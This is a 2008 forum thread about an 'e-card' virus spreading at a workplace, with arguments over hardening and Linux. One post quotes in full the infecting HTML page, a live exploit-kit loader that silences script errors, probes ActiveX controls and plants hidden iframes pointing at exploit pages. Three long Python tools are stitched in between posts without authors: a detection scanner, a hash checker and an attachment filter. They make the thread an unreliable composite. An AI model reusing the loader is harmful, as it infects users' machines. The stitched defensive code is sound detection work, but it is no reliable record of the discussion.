you have an e-card <-- wtf!
KarnivOre
2008-10-17, 15:26
i will keep this short.
where i work the e-card virus seems to be running rampant. we know how to get rid of it, but are at a loss as to how to stop the infection in the first place. i wish we could rely on an email saying "hey fuckers e-card will fuck your shit up don't go near it" but as anyone who has ever worked in IT would know, end users are their own worst enemies.
does anybody know any decent info about this virus, apart from the general stuff i can dredge up from google. if anyone has a copy of this virus i would be very interested in getting a copy (i will dl on mah shitty comp) so the security team here can study it.
muchas gracias amigos
Prometheum
2008-10-18, 00:37
Migrate to GNU/Linux.
Don't switch to a Linux based OS, you will get your brain haxxed.
First, pull the wire.
(Ya don't want people to steal ya business secrets, don't ya?)
Second, reinstall windows on every workstation and load deepfreeze on all of them.
(Don't backup ANY executable)
(Protect yourself from lusers)
Third, follow basic, small office/home hardening steps:
You don't *add* security, you remove what is insecure, you monitor what is sensitive and you establish *trust* relationships between nodes.
I will attempt to describe what basic hardening a home network/computer should go through. (DSL, behind a NAT).
[Router configuration]
Disable wireless if you don't need it.
Disable upnp.
Forward the ports used to configure the router to a non-existent node (usually only 80).
Change the router's password to a strong one. (also the default account name, if you can)
Use OpenDNS.
Disable dhcpd.
[Host configuration] (Windows)
Go to services.msc and disable what ever you don't need.
Install an anti-virus.
Upgrade to Vista, don't use the admin account as a main account. DO NOT disable UAC, it's the only fucking reason i'm advising you to upgrade to vista if you didn't already.
Install the updates. (This is THE most important part in the Host configuration)
Don't use p2p, if you do, use torrents, exclusively.
Make use of a password and disable the guest, don't enable public sharing, don't install third party apps that aren't:
From a major company (Oracle, Microsoft [...] )
With a very high price tag
Open Source (OSI approved license)
(not even a yahoo/google/whatever widget)
Particularly DO NOT install third party drivers, or even download those from the web site, install only from the cd and patch them
No cracks, warez, mods [...]
DON'T even type any personal info and/or make use of a webcam.
Disable flash, javascript and java in your web browser.
(or make use of a different profile)
Don't use common protocols that are known to be phisher's paradise, MSN, e-mail [...].
A tad bit more advanced:
Setup a rescue live cd, backups and integrity checks.
Encrypt the shit out of sensitive data.
Set up a hardware firewall.
[...] Will add more later if anybody is interested... or even got through the whole thing.
Fourth, in your situation, I'd set up a firewall.
pf from the OpenBSD project will do, you can find more at openbsd dot org.
Spliffing
2008-10-18, 08:38
umm....he works in an IT dept. i don't think that was the question he was asking.
Prometheum
2008-10-18, 14:48
I doubt it'd be a good idea to have your security team 'study' it. There's probably a signature or way to detect it. I'd just have your mailserver start scanning everything.
KarnivOre
2008-10-21, 09:19
the problem we have is it infects the resident antivirus .dll files, which spoofs an "all clear" when you scan.
the other problem is that it seems to bypass the mail filtering system as well and we are at a loss as to how! we have sent global mail to warn everyone of the virus but we all know end users aren't very careful and so we keep getting this virus. its also a complete bastard to remove!
we have however found the .htm file that infects machines, as it stores it locally in the temp folders
<HTML><BODY>
<script>window.onerror=function(){return true;}</script>
<Script Language="JavaScript">
var DDDDDDD = "QQ000000000";
var cook = "DDDDDDD";
function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}
function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}
function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="about:blank";
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<iframe width=50 height=0 src=06014.htm></iframe>")}
else
{
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!="[object Error]"){
document.write('<iframe width=10 height=0 src=realplay.htm></iframe>')}}
try{ var k;
var glworldn=new ActiveXObject("GLIEDown.IEDown.1");}
catch(k){};
finally{if(k!="[object Error]"){
document.write('<iframe style=display:none src=lz_new.htm></iframe>')}}
try{ var g;
var glworld=new ActiveXObject("GLCHAT.GLChatCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src=lz.htm></iframe>')}}
try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src=yyfb.htm></iframe>')}}
try{ var p;
var qvod=new ActiveXObject("QvodInsert.QvodCtrl.1");}
catch(p){};
finally{if(p!="[object Error]"){
document.write('<iframe width=10 height=0 src=yahoo.htm></iframe>')}}
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod");}
catch(f){};
finally{ if(f!="[object Error]"){
document.write('<iframe width=50 height=0 src=xunlei5.htm></iframe>')}}
document.write('<iframe style=display:none src=07004.htm></iframe>')
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && i=="[object Error]" && j=="[object Error]" && p=="[object Error]" && k=="[object Error]")
{location.replace("about:blank");}
}}
}
openWM();
</script>
</BODY></HTML>
which by the looks of things sets tracking cookies which rename daily and adds several registry strings. this is based on my interpretation however, as i am not very good with javascript!
what could plausibly be done about this, apart from disabling javascript (not possible as many end users frequent business sites that use it)?
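One answer to "what could plausibly be done" short of disabling JavaScript is to detect the landing page itself: the quoted .htm leaves distinctive traces (an error handler that swallows every script error, a classid for ADODB.Stream, a run of ActiveXObject probes whose ProgIDs are split across string concatenations, and zero-size or display:none iframes written by document.write). The scanner below is an added example written for this thread, not code from any poster or vendor; it walks a directory of temp files, joins split string literals so the probes read whole, and scores each file by the indicators it finds. The sample page and the benign page embedded in it are constructed for the demonstration (the CLSID and ProgIDs are the ones visible in the quoted file, the iframe src names are made up), and the weights and threshold are assumptions to tune against your own traffic.

```python
import os
import re
from dataclasses import dataclass

# Constructed sample: a reduced landing page with the same kinds of indicator as the
# .htm quoted in the thread. CLSID and ProgIDs are the ones shown there; src names are invented.
SAMPLE_HTML = r'''<HTML><BODY>
<script>window.onerror=function(){return true;}</script>
<Script Language="JavaScript">
try{ var e; var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")} catch(e){};
try{ var j; var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");} catch(j){};
finally{if(j!="[object Error]"){
document.write('<iframe width=10 height=0 src=sample_a.htm></iframe>')}}
try{ var h; var storm=new ActiveXObject("MPS.StormPlayer.1");} catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src=sample_b.htm></iframe>')}}
</script>
</BODY></HTML>'''

# Constructed benign page: a normal, visible iframe and no ActiveX probing.
BENIGN_HTML = ('<html><body><script>document.title="hello";</script>'
               '<iframe src="https://example.invalid/embed" width=300 height=200></iframe>'
               '</body></html>')


@dataclass
class Finding:
    indicator: str  # short category name
    detail: str     # what was matched (ProgID, CLSID, iframe src, ...)
    weight: int     # contribution to the risk score (assumed values)


def _unsplit_strings(js: str) -> str:
    """Join "IERP"+"Ctl.I" style concatenations so split identifiers can be matched whole."""
    return re.sub(r'(["\'])\s*\+\s*\1', '', js)


def scan_html(html: str) -> list[Finding]:
    """Return the indicators found in one HTML document, in document order."""
    text = _unsplit_strings(html)
    findings: list[Finding] = []
    # 1. A global error handler that returns true silences every failed probe.
    if re.search(r'window\.onerror\s*=\s*function\s*\(\s*\)\s*\{\s*return\s+true', text):
        findings.append(Finding("error-suppression", "window.onerror swallows script errors", 1))
    # 2. Each ActiveXObject(...) call is a probe for an installed control.
    for m in re.finditer(r'new\s+ActiveXObject\(\s*["\']([^"\']+)["\']', text):
        findings.append(Finding("activex-probe", m.group(1), 2))
    # 3. Explicit CLSIDs in classid attributes.
    for m in re.finditer(r'clsid:([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})', text, re.I):
        findings.append(Finding("classid", m.group(1).upper(), 2))
    # 4. ADODB.Stream created from script: used to write bytes to disk from a page.
    if re.search(r'createobject\(\s*["\']adodb\.stream', text, re.I):
        findings.append(Finding("adodb-stream", "ADODB.Stream instantiated from script", 3))
    # 5. Iframes the user is never meant to see (zero height or display:none).
    for m in re.finditer(r'<iframe\b([^>]*)>', text, re.I):
        attrs = m.group(1)
        hidden = re.search(r'display\s*:\s*none|\bheight\s*=\s*["\']?0\b', attrs, re.I)
        src = re.search(r'\bsrc\s*=\s*["\']?([^\s"\'>]+)', attrs, re.I)
        if hidden:
            findings.append(Finding("hidden-iframe", src.group(1) if src else "(no src)", 2))
    return findings


def risk_score(findings: list[Finding]) -> int:
    return sum(f.weight for f in findings)


def is_suspicious(html: str, threshold: int = 5) -> bool:
    """Threshold is an assumption: one hidden iframe alone should not trip it."""
    return risk_score(scan_html(html)) >= threshold


def scan_directory(root: str, threshold: int = 5) -> dict[str, int]:
    """Walk a directory (e.g. a user's temp folder) and return {path: score} for files over threshold."""
    hits: dict[str, int] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".htm", ".html")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    score = risk_score(scan_html(fh.read()))
            except OSError:
                continue
            if score >= threshold:
                hits[path] = score
    return hits


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"{f.indicator:18} {f.weight:>2}  {f.detail}")
    print("sample suspicious:", is_suspicious(SAMPLE_HTML), " benign suspicious:", is_suspicious(BENIGN_HTML))
```

Run it against a copy of the temp folders pulled from an infected machine (scan_directory), or wire scan_html into the proxy or mail gateway that already sees the HTML. The string-joining step matters more than any single regex: without it the split ProgID never matches a signature, which is exactly why the page splits it.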
Prometheum
2008-10-21, 19:15
You could just switch over to GNU/Linux. It probably isn't that hard for you to do (especially if you're re-imaging machines every time they get infected) and will save you money.
Free as in free speech and free as in "free from viruses". (http://gnewsense.org)
You could just switch over to GNU/Linux. It probably isn't that hard for you to do (especially if you're re-imaging machines every time they get infected) and will save you money.
Free as in free speech and free as in "free from viruses". (http://gnewsense.org)
To even suggest that Linux is "free from viruses" is completely wrong. Even to suggest it, which is why I believe you had the quotes around it, is just dumb.
Prometheum
2008-10-21, 23:16
To even suggest that Linux is "free from viruses" is completely wrong. Even to suggest it, which is why I believe you had the quotes around it, is just dumb.
You're really stretching in your anti-freedom trolling now. First you throw a fit that I say GNU/Linux, and now you're pulling shit out of your ass about viruses.
Name one virus for GNU/Linux in the wild right now. Name one that can spread via the same vector as the one in OP, and then we can talk.
And just for the record, Linux has no viruses at all. It's just a kernel. So your post is completely wrong.
KarnivOre
2008-10-22, 15:36
if you met some of the end users here.....
unfortunately, as this is a large company and i am only a junior, they ain't changing shit! and yeah i know about linux and all the other operating systems there are. i find linux quite hard to get to grips with as i am natively a windows user. if i am finding it hard, the average end user will probably curl up in a foetal position and hide under their desk.
"i can't get remote working to work, the computer says i need to restart"
"have you restarted the computer?"
"no"
you want to explain how to untar and build an install package to these people be my guest. one user actually had a panic attack when she couldn't find the start bar.
but back to the topic: does anyone know any useful information about the e-card virus, such as the payload etc? i have found one file: osceprot.dll which seems to infect whatever resident antivirus is present and renders it useless. so far avast! and a program called SDFix are the only things that detect anything, but they aren't able to completely cure it. any ideas besides changing OS?
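When the resident antivirus's own DLLs are the thing being tampered with, a scan from that product proves nothing, which is the case for the "integrity checks" item in Prometheum's list earlier in the thread: hash the antivirus and system binaries on a known-clean image, keep the baseline off the host, and compare from rescue media rather than from the running install. The tool below is an added example for this thread, not code from any poster or product. The file names in its demo (scanner.dll, signatures.dat, dropper.dll) are constructed placeholders, and the suffix list is an assumption about which files you would want in the baseline.

```python
import hashlib
import json
import os
import tempfile


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


# Assumed set of file types worth baselining; widen it for your own environment.
DEFAULT_SUFFIXES = (".dll", ".exe", ".sys", ".dat")


def build_baseline(root: str, suffixes=DEFAULT_SUFFIXES) -> dict[str, str]:
    """Map each matching file (path relative to root, '/' separated) to its SHA-256."""
    baseline: dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(suffixes):
                path = os.path.join(dirpath, name)
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                baseline[rel] = sha256_file(path)
    return baseline


def verify_baseline(root: str, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Compare the tree under root against a stored baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def save_baseline(baseline: dict[str, str], path: str) -> None:
    # Store this on read-only media or a server the workstation cannot write to.
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(baseline, fh, indent=2, sort_keys=True)


def load_baseline(path: str) -> dict[str, str]:
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def _write(path: str, data: bytes) -> None:
    with open(path, "wb") as fh:
        fh.write(data)


def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline a clean 'av' folder, then tamper with it and verify."""
    with tempfile.TemporaryDirectory() as root:
        av = os.path.join(root, "av")
        os.makedirs(av)
        _write(os.path.join(av, "scanner.dll"), b"MZ constructed clean scanner")
        _write(os.path.join(av, "signatures.dat"), b"constructed signature database")
        baseline = build_baseline(root)
        save_baseline(baseline, os.path.join(root, "baseline.json"))

        # Simulate what the thread describes: a patched AV DLL, a new unknown DLL, a missing file.
        _write(os.path.join(av, "scanner.dll"), b"MZ constructed patched scanner")
        _write(os.path.join(av, "dropper.dll"), b"MZ constructed unknown module")
        os.remove(os.path.join(av, "signatures.dat"))

        return verify_baseline(root, load_baseline(os.path.join(root, "baseline.json")))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In practice build the baseline once from the golden image you reimage from, and run verify_baseline against the workstation's disk while booted from the rescue live CD; a hash check run from inside an install whose scanner already lies to you has the same problem as the scanner.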
Prometheum
2008-10-22, 20:54
if you met some of the end users here.....
unfortunately, as this is a large company and i am only a junior, they ain't changing shit! and yeah i know about linux and all the other operating systems there are. i find linux quite hard to get to grips with as i am natively a windows user. if i am finding it hard, the average end user will probably curl up in a foetal position and hide under their desk.
"i can't get remote working to work, the computer says i need to restart"
"have you restarted the computer?"
"no"
you want to explain how to untar and build an install package to these people be my guest. one user actually had a panic attack when she couldn't find the start bar.
but back to the topic: does anyone know any useful information about the e-card virus, such as the payload etc? i have found one file: osceprot.dll which seems to infect whatever resident antivirus is present and renders it useless. so far avast! and a program called SDFix are the only things that detect anything, but they aren't able to completely cure it. any ideas besides changing OS?
Why are your users installing anything?
That seems to be the first problem. (The second problem is that you don't need to build anything on GNU/Linux; everything you need is in the package manager. Read the damn docs.)
Get an environment where your users are not trusted. Your users are idiots. They install viruses, bypass security measures, and are idiots. Set up windows so that they all have lower privileges than Solitaire, put ALL the files on a central server (no clue how to do this on ms, easy as fuck on GNU/Linux), and give them maybe 200MB home folders.
Also, delay email for a day and scan it with everything in existence. Disallow executable attachments or attachments you find to be executable. Disallow archives containing executables. Disassemble java files, read the source, and then email that to your users with instruction to put it through a script that runs it in a sandbox.
Seeing as you're only junior, you can do none of this. But proposing it will make you look good. Also, any user that gets the virus, punt them off of the network until their system is reimaged.
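The attachment rules in the post above (block executables, block attachments that turn out to be executable whatever their name says, block archives that contain executables) are the part of that advice a junior can actually prototype. The filter below is an added example for this thread, not code from any poster; it parses a message with the standard library, judges each attachment by its leading bytes as well as its extension, and opens zip attachments to look inside, including nested zips up to an assumed depth. The three messages it builds are constructed test data; the "PE" blob is just an MZ prefix, not a real program, and the extension list is an assumption to extend with your own gateway's policy.

```python
import io
import os
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Assumed policy: extensions Windows will execute or script-host on double click.
EXEC_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta", ".dll"}
# Leading bytes of native executables; a renamed .jpg still starts this way.
EXEC_MAGIC = (b"MZ", b"\x7fELF")


def looks_executable(name: str, data: bytes) -> bool:
    """True if either the extension or the file header says 'executable'."""
    ext = os.path.splitext(name.lower())[1]
    return ext in EXEC_EXTENSIONS or any(data.startswith(m) for m in EXEC_MAGIC)


def archive_has_executable(data: bytes, depth: int = 2) -> bool:
    """Look inside a zip (and zips within it) for anything executable."""
    if depth < 0:
        return True  # nested deeper than we are willing to unpack: treat as suspect
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return False
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(4)
                if looks_executable(info.filename, head):
                    return True
                if head.startswith(b"PK") and archive_has_executable(head + fh.read(), depth - 1):
                    return True
    return False


def classify_attachment(name: str, data: bytes) -> str:
    if looks_executable(name, data):
        return "block-executable"
    if data.startswith(b"PK") and archive_has_executable(data):
        return "block-archive-with-executable"
    return "allow"


def inspect_message(raw: bytes) -> list[tuple[str, str]]:
    """Return (filename, verdict) for every attachment in a raw RFC 5322 message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    verdicts = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "unnamed"
        data = part.get_payload(decode=True) or b""
        verdicts.append((name, classify_attachment(name, data)))
    return verdicts


def should_quarantine(raw: bytes) -> bool:
    return any(verdict != "allow" for _, verdict in inspect_message(raw))


# ---- constructed test messages ------------------------------------------------
def build_message(filename: str, data: bytes, maintype: str, subtype: str) -> bytes:
    msg = EmailMessage()
    msg["From"] = "cards@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "you have an e-card"
    msg.set_content("Open the attachment to see your card.")
    msg.add_attachment(data, maintype=maintype, subtype=subtype, filename=filename)
    return msg.as_bytes()


def make_zip(entries: dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"  # constructed header only, not a program
RENAMED_EXE_MSG = build_message("ecard.jpg", FAKE_PE, "image", "jpeg")
ZIP_MSG = build_message("ecard.zip", make_zip({"readme.txt": b"hi", "ecard.exe": FAKE_PE}), "application", "zip")
NESTED_ZIP_MSG = build_message("cards.zip", make_zip({"inner.zip": make_zip({"ecard.scr": FAKE_PE})}), "application", "zip")
CLEAN_MSG = build_message("notes.pdf", b"%PDF-1.4\nconstructed\n", "application", "pdf")

if __name__ == "__main__":
    for label, raw in [("renamed", RENAMED_EXE_MSG), ("zip", ZIP_MSG), ("nested", NESTED_ZIP_MSG), ("clean", CLEAN_MSG)]:
        print(label, inspect_message(raw), "quarantine" if should_quarantine(raw) else "deliver")
```

Drop inspect_message into whatever hook your mail gateway offers for content filtering, and log the verdict with the filename so the "how does it bypass the filter" question in the thread becomes answerable from the log rather than from guesswork.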
Dark_Magneto
2008-10-23, 19:49
Complete network admin jackbooted nazism.
I like it.
You're really stretching in your anit-freedom trolling now. First you throw a fit that I say GNU/Linux, and now you're pulling shit out of your ass about viruses.
Name one virus for GNU/Linux in the wild right now. Name one that can spread via the same vector as the one in OP, and then we can talk.
And just for the record, Linux has no viruses at all. It's just a kernel. So your post is completely wrong.
Hehehe, anti-freedom trolling. I didn't know that I was trolling. Then again, I could be just for the sake of pissing you off? Now, like I said, you would be an asshat to even suggest such a thing like "virus free". You show me an operating system that can not be infected by a virus/malicious code and I'll give up a right nut. Now, just because there isn't a virus in the wild at the moment does not mean that it can not be infected. Just because I can't name one that spreads via the same vector doesn't mean shit. You're just trying to prove a point that doesn't exist and isn't on your side. And by the way, there have been and they CAN be to infect/use kernel processes. So, saying that Linux is a kernel and it can not be infected is just so much bullshit.
Prometheum
2008-10-24, 00:32
Hehehe, anti-freedom trolling. I didn't know that I was trolling. Then again, I could be just for the sake of pissing you off? Now, like I said, you would be an asshat to even suggest such a thing like "virus free". You show me an operating system that can not be infected by a virus/malicious code and I'll give up a right nut. Now, just because there isn't a virus in the wild at the moment does not mean that it can not be infected. Just because I can't name one that spreads via the same vector doesn't mean shit. You're just trying to prove a point that doesn't exist and isn't on your side. And by the way, there have been and they CAN be to infect/use kernel processes. So, saying that Linux is a kernel and it can not be infected is just so much bullshit.
What's your vector into the kernel?
And yeah, you wouldn't, wouldn't you :p
oddballz194
2008-10-24, 00:40
What's your vector into the kernel?
And yeah, you wouldn't, wouldn't you :p
My vector: insmod
It requires root privs, but hey -- enough users still run as root to make it possible.
Prometheum
2008-10-24, 00:46
My vector: insmod
It requires root privs, but hey -- enough users still run as root to make it possible.
No, into _just_ the kernel.
insmod isn't part of the kernel, and you don't have a shell to run it in.
We're talking a Linux system here, not a GNU/Linux system. :)
Ed Lister
2008-10-24, 01:00
Why are your users installing anything?
That seems to be the first problem. (The second problem is that you don't need to build anything on GNU/Linux; everything you need is in the package manager. Read the damn docs.)
Get an environment where your users are not trusted. Your users are idiots. They install viruses, bypass security measures, and are idiots. Set up windows so that they all have lower privileges than Solitaire, put ALL the files on a central server (no clue how to do this on ms, easy as fuck on GNU/Linux), and give them maybe 200MB home folders.
Also, delay email for a day and scan it with everything in existence. Disallow executable attachments or attachments you find to be executable. Disallow archives containing executables. Disassemble java files, read the source, and then email that to your users with instruction to put it through a script that runs it in a sandbox.
Seeing as you're only junior, you can do none of this. But proposing it will make you look good. Also, any user that gets the virus, punt them off of the network until their system is reimaged.
What a complete and utter douche.
I'm glad our IT manager isn't one of your types. Granted, he probably has a range of severe psychological defects as well... It's not hard to see that your little fascist network fantasy reflects the total lack of power and strength your character lacks.
Prometheum
2008-10-25, 02:21
What a complete and utter douche.
I'm glad our IT manager isn't one of your types. Granted, he probably has a range of severe psychological defects as well... It's not hard to see that your little fascist network fantasy reflects the total lack of power and strength your character lacks.
Look, do you want to pay for the machines you break? Or the time it takes to fix them?
It isn't your damn hardware. Don't get pissy when the actual owner lets you know that.
warweed12
2008-10-25, 03:28
Sounds to me like a PEBKAC though if you can figure out how to solve this im sure you would be a millionaire i know MS has been trying to solve PEBKAC's for years but it will never happen